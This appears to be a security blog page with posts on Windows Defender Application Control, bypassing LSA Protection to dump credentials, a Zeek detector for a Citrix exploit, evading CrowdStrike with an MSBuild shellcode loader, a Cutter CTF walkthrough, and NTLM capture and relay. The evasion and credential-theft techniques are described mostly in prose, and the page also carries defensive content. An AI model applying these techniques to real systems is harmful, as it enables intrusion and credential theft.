RED CURSOR
  • Home
  • Services
  • About
  • Contact
  • Blog

Upgrading from AppLocker to Windows Defender Application Control (WDAC)

8/30/2020

0 Comments

 
​Windows Defender Application Control (WDAC), formerly known as Device Guard, is a Microsoft Windows secure feature that restricts executable code, including scripts run by enlightened Windows script hosts, to those that conform to the device code integrity policy. WDAC prevents the execution, loading and running of unwanted or malicious code, drivers and scripts. WDAC also provides extensive event auditing capability that can be used to detect attacks and malicious behaviour.

​Configuring WDAC

WDAC works on all versions of Windows, however, prior to Windows 2004 only Windows 10 Enterprise had the capability to create policies. I used Windows 2004 Professional to create this blog post. On a supported OS version you can deploy the default Windows WDAC audit policy with the command:
ConvertFrom-CIPolicy -XmlFilePath C:\Windows\schemas\CodeIntegrity\ExamplePolicies\DefaultWindows_Audit.xml -BinaryFilePath C:\Windows\System32\CodeIntegrity\SIPolicy.p7b
The DefaultWindows_Audit.xml is a reference policy supplied by Microsoft that can be used as the base to build a more customized policy. The DefaultWindows_Audit.xml is designed to only allow the base operating system. This includes WHQL approved drivers and anything in the Microsoft App Store. The AllowMicrosoft.xml policy would allow all Microsoft signed code and applications, such as Office, Teams, Visual Studio, Sysinternals, etc which I personally consider too permissive
An important distinction should be made between Windows and Microsoft signed code, Windows refers to the base operating systems while Microsoft refers to any code signed by Microsoft. The Get-AuthenticodeSignature cmdlet can be used to determine if a binary is part of the base operating system.
Picture
After enabling the DefaultWindows_Audit.xml policy with the above command and rebooting, the event log can be used to inspect code integrity violations. The events will be stored in the Applications and Service Logs > Microsoft > Windows > CodeIntegrity > Operational log. The Event ID 3076 represents a code integrity violation in audit mode, these events will be followed by at least one Event ID 3089 which provides further information regarding the signature of the binary in violation. The 3076 and 3089 events can be correlated through a Correlation ActivityID viewable within the raw XML.
The example Event ID 3076 below shows that services.exe loaded mysql.exe which did not meet the code integrity policy
Picture
This violation produced two 3089 events, as is evident with the TotalSignatureCount of 2, the first, Signature 0, displayed below shows that mysql.exe had a digital signature from Oracle
Picture
The last signature, which will always exist, is a hash created by WDAC using some internal hashing method.

​Whitelisting Software

I’m going to demonstrate creating a code integrity policy for Chrome, 7-Zip and Sublime Text 3. First, let's examine the Chrome executable files with the command:
Get-ChildItem -File -Recurse -Include *.exe, *.dll, *.sys | Get-AuthenticodeSignature
The results show that all of the Google Chrome executable files are signed with a valid signature.
Picture
The Chrome policy can be built based of the Publisher using the commands:
$SignerInfo = Get-SystemDriver -ScanPath . -NoScript -NoShadowCopy -UserPEs New-CIPolicy -FilePath Chrome.xml -DriverFiles $SignerInfo -Level Publisher
The name of the cmdlet Get-SystemDriver is misleading, since it's also designed to collect the information needed for user mode policies, and is not exclusive to drivers. The information from Get-SystemDriver is then used to create a new policy based on the Publisher level.
The rule level specified in the Level parameter is extremely important and specifies how code is authorized. The Publisher level is a combination of the PcaCertificate level (typically one certificate below the root) and the common name (CN) of the leaf certificate. This rule level allows organizations to trust a certificate from a major CA, but only if the leaf certificate is from a specific company (such as Google LLC). This is lenient in contrast to the Hash, or FilePublisher levels but reduces the maintenance overhead as it allows Chrome to update itself, and even add new files, that will continue to be trusted assuming they are signed using the same certificate. The full list of rule levels are part of the WDAC documentation.
While performing the same process on 7-Zip I discovered that none of the executable files are signed. In this instance, I could create a policy that whitelists each file using the Hash rule level which “specifies individual hash values for each discovered binary”. I have opted the less secure approach of whitelisting the 7-Zip folder to demonstrate feature parity with AppLocker.
$rules = New-CIPolicyRule -FilePathRule "C:\Program Files\7-Zip\*" New-CIPolicy -FilePath C:\Users\acebond\Documents\7-Zip.xml -Rules $rules
Picture
The 7-Zip code integrity policy is based on the FilePathRule and allows all code in the 7-Zip Program Files directory. The wildcard placed at the end of the path authorizes all files in that path and subdirectories recursively.
Sublime Text 3 contained a mixture of signed and unsigned files.
Picture
In this instance, the Fallback parameter can be used to specify a secondary rule level for executables that do not meet the primary trust level specified in the Level parameter. I chose to trust the Sublime Text 3 files based on the FilePubisher which is a combination of the FileName attribute of the signed file, plus Publisher. Files that cannot meet the FilePubisher trust level, such as the python33.dll will be trusted based on the Hash rule level.
$SignerInfo = Get-SystemDriver -ScanPath . -NoScript -NoShadowCopy -UserPEs New-CIPolicy -FilePath Sublime_Text.xml -DriverFiles $SignerInfo -Level FilePublisher -Fallback Hash
These 3 new policies can be merged into the base DefaultWindows_Audit.xml policy to whitelist Chrome, 7-Zip and Sublime Text 3. In the screenshot below I have merged all 4 policies. A quick note that Merge-CIPolicy uses the first policy specified in the PolicyPaths as the base, and does not merge policy rule options.
Picture
I have chosen to live dangerously and removed rule option 3 (Enable:Audit Mode) so the policy executes in enforcement mode.
Copy-Item "C:\Windows\schemas\CodeIntegrity\ExamplePolicies\DefaultWindows_Audit.xml" . Merge-CIPolicy -OutputFilePath Desktop.xml -PolicyPaths .\DefaultWindows_Audit.xml, .\Chrome.xml, .\7-Zip.xml, .\Sublime_Text.xml Set-RuleOption -FilePath .\Desktop.xml -Option 3 -DeleteConvertFrom-CIPolicy -XmlFilePath .\Desktop.xml -BinaryFilePath C:\Windows\System32\CodeIntegrity\SIPolicy.p7b
The new policy allows Chrome, 7-Zip and Sublime Text 3 and blocks all other software from running.
Picture

​Bypassing WDAC?

WDAC is a security boundary that cannot be bypassed without an exploit.  The only practical method to bypass WDAC is to find a misconfiguration within the organisation policy. This could be a whitelisted folder, certificate authority, or software component.
The example policy created in this blog post contains a number of leniencies that can be leveraged to circumvent WDAC. Firstly, the 7-Zip policy allows all code within the 7-Zip Program Files directory. A privileged user could place files in this directory to bypass WDAC and execute arbitrary code. Generally, WDAC policies should never whitelist entire directories.
Secondly, Sublime Text 3 comes packaged with Python which is a powerful interpreter that can be used to bootstrap the execution of arbitrary code. All software within a WDAC policy should be reviewed for scripting capabilities. The risk can either be accepted, the software removed, or in some cases the scripting functionally removed.
Lastly, the policy does not block a number of default applications built into the OS that allow the execution of arbitrary code. A list and policy to block these executables is maintained in the Microsoft recommended block rules.
To demonstrate, I’ve used the well known MSBuild executable to execute a Cobalt Strike trojan and bypassed the WDAC policy. The MSBuild.exe executable will load a number of libraries to compile and execute the code provided, but all of the executables and libraries involved are part of the base operating system and code integrity policy. This is not a WDAC vulnerability, but rather a misconfiguration in that the policy allows an executable that has the ability to execute arbitrary C# code. These are the types of executables that create holes in application whitelisting solutions.
Picture
The MSBuild bypass, and all Windows executables that bypass WDAC can be blocked by including the Microsoft recommended block rules in our WDAC policy. A number of these executables do have legitimate use cases, and I personally think the focus should be on monitoring and initial code execution methods, as running MSBuild.exe implies that an attacker already has the ability to execute commands on the system.
I saved the block rules as BlockRules.xml. If the policy is designed for a Windows 10 version below 1903 then you should also uncomment the appropriate version of msxml3.dll, msxml6.dll, and jscript9.dll at Line 65, and 798. After deploying WDAC with the additional block rules, MSBuild cannot be used as a bypass.
Picture

​Benefits of WDAC

WDAC prevents a number of attack scenarios that other solutions cannot. The following advantages of WDAC are in comparison to AppLocker, although most will be true for any application whitelisting solution.
WDAC prevents DLL hijacking since only code that meets the code integrity policy will be loaded. This effectively mitigates all DLL hijacking attacks since any planted DLLs will fail to load and create an event log that should be investigated immediately.
Privileged file operation escalation of privilege vulnerabilities (for example CVE-2020-0668 and CVE-2020-1048) cannot be weaponized. These types of vulnerabilities use a privileged file operation primitive to create or replace a binary in a privileged folder such as System32. WDAC prevents the vulnerabilities from achieving code execution since new or replaced files would violate the code integrity policy.
WDAC can be applied to drivers which run in kernel mode. This prevents tradecraft that leverages loading a malicious driver to disable or circumvent security features. My previous blog on Bypassing LSA Protection could be prevented using WDAC although Credential Guard is a better solution.
Code integrity policies can be applied and enforced even on administrative or privileged users. With a solution like AppLocker, there are hundreds of methods available that an administrative user can use to circumvent, hinder or disable the functionality. A correctly configured WDAC policy, cannot be tampered with by an administrative user, even with physical access. This can be achieved with Hypervisor-Protected Code Integrity (HVCI), Secure Boot, BitLocker and the disabling the policy rules Unsigned System Integrity Policy and Advanced Boot Options Menu.
WDAC is a security feature built on security boundaries that are guaranteed to be serviced by Microsoft. AppLocker is great, but it's designed for when you are using application control to help users avoid running unapproved software and is not designed as a security feature.
Getting initial code execution on an endpoint device is one of the most difficult phases during a red team engagement. As such, malicious or unintended code execution on a device should be treated as a security boundary. Preventing code execution from taking place in the first instance is one of the best defensive actions that can be implemented within an organisation.
0 Comments

Bypassing LSA Protection (aka Protected Process Light) without Mimikatz on Windows 10

7/6/2020

2 Comments

 
Starting with Windows 8.1 (and Server 2012 R2) Microsoft introduced a feature termed LSA Protection. This feature is based on the Protected Process Light (PPL) technology which is a defense-in-depth security feature that is designed to “prevent non-administrative non-PPL processes from accessing or tampering with code and data in a PPL process via open process functions”.

I’ve noticed there is a common misconception that LSA Protection prevents attacks that leverage SeDebug or Administrative privileges to extract credential material from memory, like Mimikatz. LSA Protection does NOT protect from these attacks, at best it makes them slightly more difficult as an extra step needs to be performed.


To bypass LSA Protection you have a few options:
  1. Remove the RunAsPPL registry key and reboot (probably the worst method since you’ll lose any credentials in memory)
  2. Disable PPL flags on the LSASS process by patching the EPROCESS kernel structure
  3. Read the LSASS process memory contents directly instead of using the open process functions

​The latter 2 methods require the ability to read and write kernel memory. The easiest method to achieve this will be through loading a driver, although you can create your own I’ve decided to leverage the RTCore64.sys driver from the product
MSI Afterburner. I chose this driver because it's signed and allows reading and writing arbitrary memory, thanks MSI.


I decided to implement the 2nd method since removing the PPL flags allows the usage of already established tools like Mimikatz to dump the credential material from LSASS. To do this we need to find the address of the LSASS EPROCESS structure and patch the 5 values: SignatureLevel, SectionSignatureLevel, Type, Audit, and Signer to zero.

The EnumDeviceDrivers function can be used to leak the kernel base address. This can be used to locate the PsInitialSystemProcess which points to the EPROCESS structure for the system process. Since the kernel stores processes in a linked list, the ActiveProcessLinks member of the EPROCESS structure can be used to iterate the linked list and find LSASS.
Picture
Figure 1 - Code to find the LSASS EPROCESS structure
If we look at the EPROCESS structure (see Figure 2 below) we can see that the 5 fields we need to patch are all conventionally aligned into a continuous 4bytes. This lets us patch the EPROCESS structure in a single 4 byte write like so:
​
WriteMemoryPrimitive(Device, 4, CurrentProcessAddress + SignatureLevelOffset, 0x00);
Picture
Figure 2 - EPROCESS structure offsets on Windows 1909
​Now that the PPL has been removed, all the traditional methods of dumping LSASS will work, such as MimiKatz, the MiniDumpWriteDump API call, etc.
The tool which is written in C/C++ to perform this attack can be found on GitHub. I’ve only tested on Windows 1903, 1909 and 2004. It should work on all versions of Windows since the feature was introduced but I’ve only got the offsets for those versions implemented.
2 Comments

Using Zeek to detect exploitation of Citrix CVE-2019-19781

7/6/2020

0 Comments

 

Using the tool

Zeek, formally known as bro, is a high-level packet analysis program. It originally began development in the 1990s and has a long history. It does not directly intercept or modify traffic, rather it passively observes it and creates high-level network logs. It can be used in conjunction with a SIEM to allow quick analysis. It can operate in realtime to create logs of a currently active system, or as a post-mortem analysis tool of a packet capture. This tool can also operate with pf_ring to increase network capture performance due to a well-supported plugin.

Creating a script

While zeek does have some good documentation online, it is definitely lacking in any sort of tutorial-based content for beginners. This is especially true for anyone who wants to try their hand at using zeek scripting language to create a custom plugin.

A simplified understanding of what a signature detection based zeek plugin has to do is:

  1. Define the log format and alert types for the plugin
  2. Define the signatures for detection
  3. Initialize zeek to include a new LogStream
  4. Create an event listener that matches your packets protocol

CVE-2019-19781 signatures

Between the patterns defined in this yara rule and the us-cert alert a pattern can be constructed. In this case, the following regex patterns will be used to match malicious URIs:

.*\/\.\.\/vpns\/.*
.*\/vpns\/.*
.*\/vpns\/cfg\/smb.conf
.*\/vpns\/portal\/scripts\/newbm\.pl.*
.*\/vpns\/portal\/scripts\/rmbm\.pl.*
.*\/vpns\/portal\/scripts\/picktheme\.pl.*

Importing necessary protocols and defining the module

Here we define the module as NETSCALARD, although a CVE number would have been just as appropriate.

@load base/protocols/http
@load base/frameworks/notice

module NETSCALARD;

Defining log file

To define the log file there needs to be a log identifier, in this case a NETSCALARD::LOG is used, and a record entry for how the data should be recorded into the file.

export {
    ## The logging stream identifier.
    redef enum Log::ID += { LOG };

    ## The record type which contains column fields of the certificate log.
    type Info: record {
        src:         addr   &log;
        dst:         addr   &log;
        ## Timestamp when this record is written.
        ts:          time   &log;
        ## URI of request
        URI:         string &log;
    };
    # cont.
}

Defining notice type

Zeek allows plugins to define a different Notice type that can be used when generating emails. There are a lot of pre-defined notices that can be used and they are indexed here.

export {
    # cont.
    redef enum Notice::Type += {
        Netscalar_Attack,
    };
    # cont.
}

Defining signatures

Zeek provides a pattern type that can be used to quickly define multiple regex patterns. The language also has some pattern specific operations such as in which can check if a pattern is found in a string.

export {
    # cont.
    const match_bad_signatures =
          /.*\.\.\/vpns\/.*/
        | /.*vpns\/cfg\/smb.conf/
        | /.*vpns\/portal\/scripts\/newbm\.pl/
        | /.*vpns\/portal\/scripts\/rmbm\.pl/
        | /.*vpns\/portal\/scripts\/picktheme\.pl/ &redef;
}

Initializing Zeek

When initializing zeek there are a few different methods of recording events. In this case a dedicated log file was chosen. To create this log stream based on the log specifications Log::create_stream can be used.

event zeek_init() &priority=3 {
    Log::create_stream(NETSCALARD::LOG, [$columns=Info, $path="netscalard-attacks"]);
}

Creating an event listener

The netscalard exploit uses a POST request to one of the defined bad URIs. To effectively match this pattern and not cause encumberance with checking every request the code will quickly return from packets that are not a POST request, or that don’t meet one of the defined signatures. The remaining packets, the malicious packets, can be recorded. To record the attack the code creates a notice that will be placed in notice.log as well as a dedicated log entry for the netscalard-attacks log file.

event http_request(c: connection, method: string, original_URI: string,
        unescaped_URI: string, version: string) &priority=3 {

    if (!( method == "POST" ))
        return;

    if (!( match_bad_signatures in unescaped_URI ))
        return;

    NOTICE([
        $note=Netscalar_Attack,
        $msg=fmt("Netscalar attack attempt made by (%s) against (%s)", c$id$orig_h, c$id$resp_h),
        $sub=cat(c$id$orig_h,c$id$resp_h,unescaped_URI)
    ]);

    Log::write(
        NETSCALARD::LOG,
        Info(
            $src=c$id$orig_h,
            $dst=c$id$resp_h,
            $ts=network_time(),
            $URI=unescaped_URI
        )
    );
}

Output

After running this script against the local interface for testing with the following command:

sudo zeek -C -i lo ../detect-netscalard.zeek

There are some log files generated. Once a malicious packet has been detected, in this case triggered from a curl command, then a new notice.log file and netscalard-attacks.log will be generated. The notices file can be fed into zeek-cut to extract the important information.

> $ cat notice.log | zeek-cut -d note msg
NETSCALARD::Netscalar_Attack    Netscalar attack attempt made by (127.0.0.1) against (127.0.0.1)
NETSCALARD::Netscalar_Attack    Netscalar attack attempt made by (127.0.0.1) against (127.0.0.1)
NETSCALARD::Netscalar_Attack    Netscalar attack attempt made by (127.0.0.1) against (127.0.0.1)
NETSCALARD::Netscalar_Attack    Netscalar attack attempt made by (127.0.0.1) against (127.0.0.1)
NETSCALARD::Netscalar_Attack    Netscalar attack attempt made by (127.0.0.1) against (127.0.0.1)
> $ cat netscalard-attacks.log
#fields src dst ts  URI
#types  addr    addr    time    string
127.0.0.1   127.0.0.1   1593933273.086046   /vpns/portal/scripts/newbm.pl
127.0.0.1   127.0.0.1   1593933273.486067   /vpns/portal/scripts/newbm.pl
127.0.0.1   127.0.0.1   1593933273.799568   /vpns/portal/scripts/newbm.pl
127.0.0.1   127.0.0.1   1593933274.093156   /vpns/portal/scripts/newbm.pl
127.0.0.1   127.0.0.1   1593933274.371653   /vpns/portal/scripts/newbm.pl
#close  2020-07-05-17-14-46

Using this plugin post-mortem analysis can also be performed. An example command for this is shown below:

sudo zeek ../detect-netscalard.zeek -r packetcapture.pcap
0 Comments

Bypassing CrowdStrike Endpoint Detection and Response

6/29/2020

12 Comments

 
In a recent engagement I had to compromise a hardened desktop running CrowdStrike and Symantec Endpoint Protection. The initial code execution method was my reliable favorite MSBuild (C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe) which could be leveraged to execute C# code as an inline task.
​
Initially I wrote a very basic loader that used a bruteforce decryption algorithm to run a Cobalt Strike beacon using VirtualAlloc and CreateThread.
Picture
The shellcode was stored encrypted within the C# code and decrypted using a multibyte XOR key with the last 3 bytes removed. The while loop continuously increments the decryption key,  performs XOR decryption and hashes the decrypted payload until the hash value of the decrypted shellcode matches its original hash value. This methods prevents antivirus or snooping eyes from easily reading the shellcode, and in fact no antivirus product would spend the amount of time required to decrypt the shellcode even if they knew how to run C# code in MSBuild project files.

CrowdStrike detected and prevented the VirtualAlloc/CreateThread method and classified it as “Process Hollowing”.
I'd never seen that technique detected before, but had been waiting for the day. I knew I’d have to take CrowdStrike seriously and wrote a new loader that used the same decryption routine but now executed code using the undocumented NtMapViewOfSection and NtQueueApcThread functions.

The NtMapViewOfSection routine maps a view of a section object into the virtual address space of a subject process.

The NtQueueApcThread routine adds a user-mode asynchronous procedure call (APC) object to the APC queue of the specified thread.
​
These methods are far less common, and considered more stealthy. The majority of the loader code was taken from the Sharp-Suite UrbanBishop POC (https://github.com/FuzzySecurity/Sharp-Suite) which implemented exactly what I wanted. I updated the POC slightly to support inline shellcode and automatic process selection for the injection.
Picture
The loader now successfully bypassed the CrowdStrike prevention rules. The use of MSBuild did trigger a detection alert in this particular configuration that was unfortunately unavoidable unless a different initial code execution method was used. The detection alert was not a prevention which meant the shell was allowed to live.
Picture
The loader does create a suspended thread in the remote process to queue the APC. This can be avoided by selecting an already existing thread, however the thread needs to enter/be in an alertable state for the APC to execute and picking the wrong thread can impact the stability of the remote process. The trade-off for that extra bit of stealthiness did not seem worthwhile but I figured I'd mention it for anyone writing detections.
12 Comments

Introduction to Cutter

5/22/2020

0 Comments

 

Introduction to Cutter

Cutter is a Graphical User Interface (GUI) built around the long-lived radare2 disassembler. The largest problem with radare2 is it's usability. Whilst radare is efficient to use once mastered, it has many problems for first time users. Running pdf to ‘print disassembled function’ or aaa to analyze and auto-name all functions might seem intuitive to long time users but the tools overall lack of user-friendly guides has seen stunted usage growth.

Cutter has succeeded in porting radare's fantastic capability into a graphical interface that can compete with the likes of Hopper, IDA, BinaryNinja and Ghidra all while remaining completely free. It also has the added benefit of being multi-platform.

The General Interface

Opening a Binary

When Cutter first launches up you are presented with the below menu that provides a short history of previously opened files, as well as a way to select files from disk.

Picture

Analysis level

In radare2, there are different analysis levels that can be appropriate for different circumstances. Since most CTF binaries are usually relatively small, the default option works fine.

Getting a graph view

Once inside the Cutter project view, the differing panes allow you to see quickly the different parts of the code, and all panes can be resized, moved or closed at will. One of these views in particular, the graph view, is very reminiscent of BinaryNinja and contains the logical flow of the program. When clicking through the different functions in the functions panel the hexdump, dissassembly, decompiler and graph view will all be updated in real time. My personal favourite when trying to figure out different sections of the code is to have the functions on the left, graph view in the middle and Decompiler on the right.

Picture

Completing a basic PicoCTF Challenge

To show the basic functionality and usage of the tool I will quickly run through a picoCTF reversing challenge from 2018 titled “be quick or be dead 1”.

Executing the binary

The first step is to investigate the binary to see what file type it is, and then execute it.

Picture

Since this is an ELF binary I can run it in my linux environment after giving it the executable flag with chmod +x be-quick-or-be-dead.

Picture

Opening it with Cutter

Now that we know the binary has some sort of check preventing us from receiving the flag, we can open it up with cutter.

When opening it I use the default analysis level.

Picture

Once cutter is open we are greeted with a lot of information. From this default view we can quickly see some functionality that would be useful. On the left side of the screen we can see all the defined functions in the binary, such as main and print_flag. In the center we can see some useful information about the binary, such that it is an ELF binary. At the bottom we can see the different tab views available to use for analysing the binary.

Picture

Analysing the function calls

The first thing we want to is analyse the main function. We can access the main function in the graph view simply by double clicking the main function in the function listing panel. This reveals the graph view of the main function, normally the graph view would show different branches but the main function simply calls four different functions then exits.

Picture

We can see the four different functions, and we can jump to each of their definitions by double clicking them.

Picture

In this case I clicked the print flag function since it seems like the obvious choice.

Picture

Unfortunately we notice that there is a decrypt_flag function that is run, which probably relates to the main functions invocation of get_key. Since this function has no checks that would cause the binary to fail I decide to take a different approach. When the binary initially ran it printed a message saying that a faster machine was needed, so I decided to look at the strings and see if I could locate the message.

Picture

This turned out to be a good choice as we can located the string and it’s address very easily.

By pressing x while highlighting this string, or right-clicking and choosing show X-refs (cross-references) we can see were this string is used in the code. In this case, it is used in a mov instruction in the alarm_handler function.

Picture
Picture
Picture

Looking at this function we can see that it calls puts on our string, and then immediately exits. We can find where this function is referenced by going to the functions panel on the left and pressing x again, or right-clicking and choosing show X-refs. This will lead us closer to our culprit. In this case we can see that the function is only referenced in the set_timer function.

We can now try to understand the functionality of the set timer function to figure out why our program ends abruptly. We can also see cutters branching come into play in this function as it uses a jne (Jump if not equal) instruction to see if an error code is raised after calling __sysv_signal.

Picture
Picture

Now that we have found our culprit function, we can look into how exactly it works. A useful tool when trying to figure out the functionality of some machine code is a decompiler. Cutter actually comes with a C++ rewrite of the Ghidra decompiler, as well as it’s own retdec. We can enable this decompiler view by going to the top bar and clicking Windows -> Decompiler.

Picture
Picture

This decompiler view allows us to more readily understand the set_timer function.

We cab see that the function has two significant system calls, one to __sysv_signal and the other to alarm. To understand these functions I like to use man pages.

The two pages I used for this analysis are:

  • Man Page for signal
  • Man Page for alarm

From this I was able to infer three important pieces of information.

__sysv_signal is used to set a function to be called when a specific signal is sent inside the binary.

0xe, or 14, refers to SIGALRM.

alarm will send SIGALRM after a given number of seconds.

So in this case the function will:

  • Set alarm_handler to run when the binary sends SIGALRM
  • Set the binary to send SIGALRM after 1 second.

So by removing the call to alarm from the binary, alarm_handler should never be hit and the binary should finish running as expected.

Patching the binary with NOPs

When patching the binary it is important to remember that you are changing the binary on disk, and that it is wise to create copies of the binary in it’s original state. What we want to do in this case is change the call to alarm to a NOP (No Operation) instruction so that the binary will not terminate prematurely. We can do this by right clicking the call to alarm in either the disassembly, graph or decompiler view and choosing Edit -> Nop Instruction. I personally recommend doing this through the graph or disassembly view to ensure the correct instruction is NOP’d.

Picture

Getting the flag

Now that alarm is never being called, we can shut down cutter and run the binary and we should get the flag.

Picture

There are definitely a couple other ways we could have done solved this challenge and some unanswered questions.

  • Why was the binary taking so long to run?
  • What happens if we NOP the call to set_alarm?
  • Can we use a debugger to ignore SIGALRM? (GDB will do this by default).

All in all Cutter is a solid tool that is built on a well maintained project and it should see continual improvements into the future.

0 Comments

Capturing and Relaying NTLM Authentication: Methods and Techniques

5/14/2020

0 Comments

 
This blog post will provide an overview of the methods available to force NTLM authentication to a rogue server, and capture or relay the credential material. These attacks can be leveraged to escalate privileges within an Active Directory domain environment. I like to look at these attacks as having 3 stages which are:
  1. Positioning a rogue authentication server so that it is accessible by the victims’ endpoint;
  2. Persuading the victim user or OS into authenticating to the rogue server; and lastly
  3. Relaying or cracking the obtained credential material.

​Stage 1: The Rogue Server

The rogue authentication server can be a compromised endpoint, network implant or Internet based server. This will largely depend on the type of engagement (Red Team, Internal Penetration Test, Phishing, etc) and your current privileges within the network.

Generally speaking, a network implant (which could just be your laptop) will be the easiest and most flexible option. A compromised endpoint will mean dealing with the local firewall and antivirus, however this rarely prevents the attack, but will create extra caveats. An Internet based server will only work if SMB and/or WebDAV outbound is allowed, and will often limit relay options.

There are 4 open source tools that can be used to create a rogue authentication server. These are:
  • https://github.com/lgandx/Responder
  • https://github.com/SecureAuthCorp/impacket
  • https://github.com/Kevin-Robertson/Inveigh
  • https://github.com/Kevin-Robertson/InveighZero
​
Responder and Impact (specifically the ntlmrelayx script) are written in Python and work best on Linux, Inveigh is written in PowerShell and designed for Windows hosts, InveighZero is written in C# and also designed for Windows hosts. These tools are all parts of toolkits that provide more features than just a rogue authentication server, and I’ll discuss these features in the following sections.

Stage 2: Coerced Authentication​

This is the hardest part of the attack, and can often require a good level of creativity. The objective is to coerce a user or machine into authenticating to the rogue authentication server using NTLM authentication, which fortunately for us, is supported by a large number of common protocols (such as SMB, HTTP, RDP, LDAP, etc). The most popular method would be LLMNR/NBN-NS/mDNS poisoning, which I’ll discuss first, but there are an array of good options available.

Link Local Multicast Name Resolution (LLMNR), NetBIOS Name Service (NBT-NS) and Multicast DNS (mDNS) are name resolution services that are built into Windows and enabled by default. LLMNR/NBN-NS/mDNS poisoning attacks leverages the fact that Windows will assume everyone on the network is trusted. This allows an attacker to respond to legitimate queries with the rogue authentication server IP address. Since Windows is generally performing name resolution with the intent of connecting to the server, this causes machines throughout the network to authenticate to the rogue server. All the tools mentioned above expect Impact have name spoofing capabilities built-in.

The same principle discussed in the above name resolution attacks apply to the link layer Address Resolution Protocol (ARP). ARP poisoning can be leveraged to convince targeted victims into thinking that the rogue server is actually the file server, or Domain Controller or any legitimate server that already exists within the network. This can lead to the victim authenticating to the rogue server instead of the legitimate server it initially intended on communicating with.

T
here are a number of file types that when parsed by Windows Explorer, will cause the download of a remote resource. This remote recourse can be a file that requires NTLM authentication, which Windows will perform automatically and without user interaction. These files types are SCF, LNK and URL. By putting these files into a network share, with a filename that causes them to be displayed at the top of the directory listing for added effect, visitors will automatically authenticate to the rogue server. Mileage may vary as Windows 10 seems to have removed this “feature” for at the very least SCF files.

Phishing or backdooring files for NTLM authentication is another common method. PDF, Microsoft Word and Microsoft Access files can be crafted to cause an NTLM authentication request when opened. These filetypes all supported embedding external content that will be automatically fetched by the respective program. An attacker can leverage this functionality to coerce authenticate requests. I doubt that list is exhaustive and encourage you to research the types of files used on the network for UNC path injection positions.

Security researchers have discovered vulnerabilities within Microsoft software that allows an attacker to force a target machine into performing NTLM authentication with an arbitrary host. The SpoolSample vulnerability by Lee Christensen uses the Print System Remote Protocol (MS-RPRN) interface to requests that a server send updates to an arbitrary host regarding the status of print jobs. This can be used to coerce any machine running the service into authenticating to any machine. This method is so powerful, it can be leveraged to move laterally through Active DIrectory forests.

A ZDI researcher discovered the ability to request Exchange to authenticate to an arbitrary URL over HTTP via the Exchange PushSubscription feature. This attack was called PowerPriv and could often be used to escalate to Domain Admin given the excessive privileges held by the Exchange servers group. Both of these issues were initially considered intended behaviour by Microsoft but later patched due to the security consequences. However, I still come across vulnerable Windows and Exchange servers on internal networks so these methods remain very useful.

There are a few MS-SQL stored procedures that can be leveraged for NTLM authentication. These can be useful when you have the ability to execute SQL queries on an MS-SQL server through compromised credentials, privilege misconfigurations, or an SQL injection vulnerability. The stored procedures xp_dirtree and xp_fileexist can be used with a UNC path to cause the SQL service account to perform an SMB connection and NTLM authentication request.

Stale Network Address Configurations (SNACs) are misconfigurations whereby a server is trying to connect to an IP address that no longer exists within the network. IP aliasing can be used to assign the stale IP address to a network interface on an attacker controlled device to receive the traffic from the misconfigured server. One of the possible outcomes is that the server will connect using a protocol that supports NTLM authentication, and respond to authentication requirements. The tool Eavesarp can help discover these misconfigurations.

​
By default Windows has IPv6 enabled, and will periodically request an IPv6 address using DHCPv6. If IPv6 is not used within the internal network, and IPv6 has not been disabled, then an attacker can stand-up a DHCPv6 server. The malicious DHCPv6 server can be used to assign link-local IPv6 address and configure the default DNS server. Since IPv6 takes precedence over IPv4, the attacker now controls DNS lookups and can selectively poison queries to force the victims into connecting to a rogue authentication server.

​Stage 3.1 : Cracking the Hash

This section requires understanding the basics of the NTLM authentication protocol. NTLM authentication is a challenge-response protocol, whereby a client connecting to a server will be presented with a challenge (in NTLMv1 this would be an 8-byte random number), the client must encrypt the challenge value with their NTLM password hash and return this value to the server for verification. The server is then responsible for validating the encrypted value using its local Security Account Manager (SAM) database or with the help of a Domain Controller. The validation is performed by performing the same encryption operation and checking if the client was correct.

In the event a client performs NTLM authentication with a rogue authentication server, the same process described above takes place. This allows the attacker to obtain a value encrypted with the NTLM hash of the user who authenticated. This key material is an effective hash that can be brute forced to disclose the users plaintext password.

The brute force process reads a password from a wordlist, converts it to an NTLM hash, encrypts the challenge with the NTLM hash (creating a challenge response) and checks if it matches the challenge response received from the victim to determine if the guessed password is correct.

The attacker can control the challenge, which does allow the use of rainbow tables (precomputed lookup tables), but this only works for the older NTLMv1 protocol. In the NTLMv2 implementation, the client chooses part of the challenge which mitigates rainbow table attacks.

​Stage 3.2: Relaying the Hash

​Since the attacker can choose the challenge, nothing prevents the attacker from retrieving a challenge from a service within the network and having the victim solve it. This allows the attacker to authenticate to an arbitrary service within the network as the victim.
Picture
Depending on the victim privileges, this can be leveraged to further compromise machines within the network, gain access to file servers, update Active Directory objects on the Domain Controller, etc.

The advantage of relying is that the credential material never has to be cracked, although you can still perform a brute force to recover the plaintext password as described in 3.1. The only downside is the additional time required to set up the relay server and select appropriate relay targets.

​
This can be done using Impacket ntlmrelayx, Inveigh-Relay or Responder MultiRelay.

​Recommendations and Mitigations

​I’m going to break down the recommendations and mitigation into each of the 3 phases of the attack.

Stage 1: The Rogue Server
  • Use MAC address filtering to prevent rogue devices connecting to the network
  • Ensure adequate endpoint protections and hardening best practices are applied to prevent a compromise in the initial instance
  • Block SMB and WebDAV outbound to the Internet

Stage 2: Coerced Authentication
  • Patch operating systems
  • Disable LLMNR and NBT-NS
  • Disable WebDAV on all endpoints
  • Ensure ARP packets are validated against an authoritative source such as the DHCP lease reservations
  • Ensure there are no stale network address configurations
  • Ensure file shares follow the principle of least privilege
  • Ensure reasonable and logical network segregation

Stage 3: Relaying and Cracking
  • Enable SMB and LDAP signing
  • Ensure a strong password policy
  • Put privileged accounts into the Protected Users Security Group

The attack leverages weakness in Microsoft protocols and default configurations. Even if all the recommendations and mitigations are applied, some methods such as backdoored files will continue to be effective but the impact should be limited. 
0 Comments

Game Over Privileges

5/11/2020

0 Comments

 
On Windows a privilege is the right of an account, such as a user or group account, to perform various system-related operations on the local computer. There are 36 privileges defined in the Privilege Constants although a number are used internally by the operating system. There are a number of privileges that are considered game over, in that, if a user gains access to a game over privilege, they effectively have every privilege and can achieve code execution under the NT AUTHORITY\SYSTEM (referred to as SYSTEM) account.

I wanted to discuss privileges from a practical offensive standpoint. These are actually just my notes on privileges made into a blog post because I needed to clean them up.
​

Attack 1:
If you gain access to (through a misconfiguration, vulnerability in a more privileged process, etc) any of the game over privileges you have completely compromised the local computer.

